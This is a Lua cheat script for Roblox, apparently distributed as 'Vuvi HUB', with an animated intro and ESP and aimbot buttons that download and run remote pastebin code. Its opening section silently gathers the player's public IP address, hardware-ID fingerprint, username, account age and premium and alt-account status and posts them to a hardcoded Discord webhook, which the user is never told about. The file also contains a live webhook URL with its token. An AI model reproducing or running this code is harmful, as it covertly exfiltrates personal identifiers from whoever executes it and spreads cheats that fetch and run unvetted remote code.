local IP = game:HttpGet("https://v4.ident.me")
plr = game:GetService'Players'.LocalPlayer
local premium = false
local ALT = false
if plr.MembershipType == Enum.MembershipType.Premium then
	premium = true
elseif plr.MembershipType == Enum.MembershipType.None then
	premium = false
end
if premium == false then 
	if plr.AccountAge <= 70 then 
		ALT = true
	end
end
 
local market = game:GetService("MarketplaceService")
local info = market:GetProductInfo(game.PlaceId, Enum.InfoType.Asset)
 
 
local http_request = http_request;
if syn then
	http_request = syn.request
elseif SENTINEL_V2 then
	function http_request(tb)
		return {
			StatusCode = 200;
			Body = request(tb.Url, tb.Method, (tb.Body or ''))
		}
	end
end
 
local body = http_request({Url = 'https://httpbin.org/get'; Method = 'GET'}).Body;
local decoded = game:GetService('HttpService'):JSONDecode(body)
local hwid_list = {"Syn-Fingerprint", "Exploit-Guid", "Proto-User-Identifier", "Sentinel-Fingerprint"};
hwid = "";
 
for i, v in next, hwid_list do
	if decoded.headers[v] then
		hwid = decoded.headers[v];
		break
	end
end
 
if hwid then
local HttpServ = game:GetService('HttpService')
local url = "https://discord.com/api/webhooks/1135913144208867338/ZSePbge-Je9Vk0nxnNNLjH8TLBNoDtHxmmRsAQ4fuusA08gGF-X4EL7njAh0NW98FgT8"
 
 
local data = 
    {
        ["content"] = "```Someone executed Vuvi HUB!!```",
        ["embeds"] = {{
            ["title"] = "__**HWID:**__",
            ["description"] = hwid,
            ["type"] = "rich",
            ["color"] = tonumber(0xAB0909),
            ["fields"] = {
                {
                    ["name"] = "Username:",
                    ["value"] = Game.Players.LocalPlayer.Name,
                    ["inline"] = true
                },
				{
                    ["name"] = "IP Address:",
                    ["value"] = IP,
                    ["inline"] = true
                },
				{
                    ["name"] = "Game Link:",
                    ["value"] = "https://roblox.com/games/" .. game.PlaceId .. "/",
                    ["inline"] = true
                },
				{
					["name"] = "Game Name:",
					["value"] = info.Name,
					["inline"] = true
				},
				{
					["name"] = "Age:",
					["value"] = plr.AccountAge,
					["inline"] = true
				},
				{
					["name"] = "Premium:",
					["value"] = premium,
					["inline"] = true
				},
				{
					["name"] = "ALT:",
					["value"] = ALT,
					["inline"] = true
				},
 
            },
        }}
    }
    local newdata = HttpServ:JSONEncode(data)
 
    local headers = {
            ["content-type"] = "application/json"
    }
 
    local request_payload = {Url=url, Body=newdata, Method="POST", Headers=headers}
    http_request(request_payload)
	setclipboard(hwid)
else
	game:GetService("Players").LocalPlayer:Kick('Unable to find HWID! Contact Poseidon Support.')
end

local Intro = Instance.new("ScreenGui")
local bluebackground = Instance.new("Frame")
local ultimateadminlogo = Instance.new("TextLabel")
local line = Instance.new("Frame")
local credit = Instance.new("TextLabel")
local usetutorial = Instance.new("TextButton")
local ImageLabel = Instance.new("ImageLabel")
--Properties:
Intro.Name = "Intro"
Intro.Parent = game.CoreGui


ImageLabel.Parent = Intro
ImageLabel.BackgroundColor3 = Color3.new(128, 128, 128)
ImageLabel.Position = UDim2.new(-0.0340000018, 0, -1000, 0)
ImageLabel.Size = UDim2.new(0, 3000, 0, 2000)
ImageLabel.Image = "http://www.roblox.com/asset/?id=4713289603"

ultimateadminlogo.Name = "ultimateadminlogo"
ultimateadminlogo.Parent = Intro
ultimateadminlogo.BackgroundColor3 = Color3.new(1, 1, 1)
ultimateadminlogo.BackgroundTransparency = 1
ultimateadminlogo.BorderSizePixel = 5
ultimateadminlogo.Position = UDim2.new(0.232999995, 0, -50, 0)
ultimateadminlogo.Size = UDim2.new(0, 813, 0, 227)
ultimateadminlogo.Text = "Vuvihub"
ultimateadminlogo.TextColor3 = Color3.new(0, 0, 0)
ultimateadminlogo.TextScaled = true
ultimateadminlogo.TextSize = 14
ultimateadminlogo.TextStrokeTransparency = 0
ultimateadminlogo.TextWrapped = true

line.Name = "line"
line.Parent = Intro
line.BackgroundColor3 = Color3.new(0, 0, 0)
line.Position = UDim2.new(0.619000018, 0, -50, 0)
line.Size = UDim2.new(0, 10, 0, 129)

credit.Name = "credit"
credit.Parent = Intro
credit.BackgroundColor3 = Color3.new(1, 1, 1)
credit.BackgroundTransparency = 1
credit.Position = UDim2.new(0.630999982, 0, -0.200000003, 0)
credit.Size = UDim2.new(0, 156, 0, 102)
credit.Font = Enum.Font.Highway
credit.Text = "By vuvistudio on discord"
credit.TextColor3 = Color3.new(0, 0, 0)
credit.TextScaled = true
credit.TextSize = 14
credit.TextWrapped = true

usetutorial.Name = "usetutorial"
usetutorial.Parent = Intro
usetutorial.BackgroundColor3 = Color3.new(1, 1, 1)
usetutorial.BackgroundTransparency = 1
usetutorial.Position = UDim2.new(0.312999994, 0, 3, 0)
usetutorial.Size = UDim2.new(0, 546, 0, 56)
usetutorial.Font = Enum.Font.SourceSans
usetutorial.Text = "(Works on all paid exploits usually and some free exploits too)"
usetutorial.TextColor3 = Color3.new(0, 0, 0)
usetutorial.TextScaled = true
usetutorial.TextSize = 14
usetutorial.TextWrapped = true




ImageLabel:TweenPosition(UDim2.new(-0.034, 0,-0.039, 0), 'In', 'Bounce', 3, true)
wait(3)
ultimateadminlogo:TweenPosition(UDim2.new(0.233, 0,0.361, 0), 'In', 'Bounce', 1, true)
wait(1)
line:TweenPosition(UDim2.new(0.619, 0,0.419, 0), 'In', 'Bounce', 1, true)
wait(1)
credit:TweenPosition(UDim2.new(0.631, 0,0.435, 0), 'In', 'Bounce', 0.6, true)
wait(1)
usetutorial:TweenPosition(UDim2.new(0.313, 0,0.556, 0), 'In', 'Bounce', 1, true)
wait(3)
credit:TweenPosition(UDim2.new(0.631, 0,-0.2, 0), 'Out', 'Linear', 0.2, true)
wait(0.1)
ultimateadminlogo:TweenPosition(UDim2.new(0.233, 0,-50, 0), 'Out', 'Linear', 1, true)
wait(0.1)
line:TweenPosition(UDim2.new(0.619, 0,-50, 0), 'Out', 'Linear', 1, true)
wait(0.1)
usetutorial:TweenPosition(UDim2.new(0.313, 0,3, 0), 'Out', 'Linear', 0.5, true)
wait(1)
ImageLabel:TweenPosition(UDim2.new(-0.034, 0,-1000, 0), 'Out', 'Bounce', 1, true)

local Library = loadstring(game:HttpGet("https://raw.githubusercontent.com/VuviTheGoat/VUVILIBRARY/main/Library"))()

local window = Library.new("VuviHub")

window:LockScreenBoundaries(false)

local tab = window:Tab("FutureTops")

local section = tab:Section("Main")


section:Button("Esp", function()
    loadstring(game:HttpGet("https://pastebin.com/raw/s7viVmDR"))()
end)

section:Button("Aimbot", function()
    loadstring(game:HttpGet("https://pastebin.com/raw/ygp8Enye"))()
end)
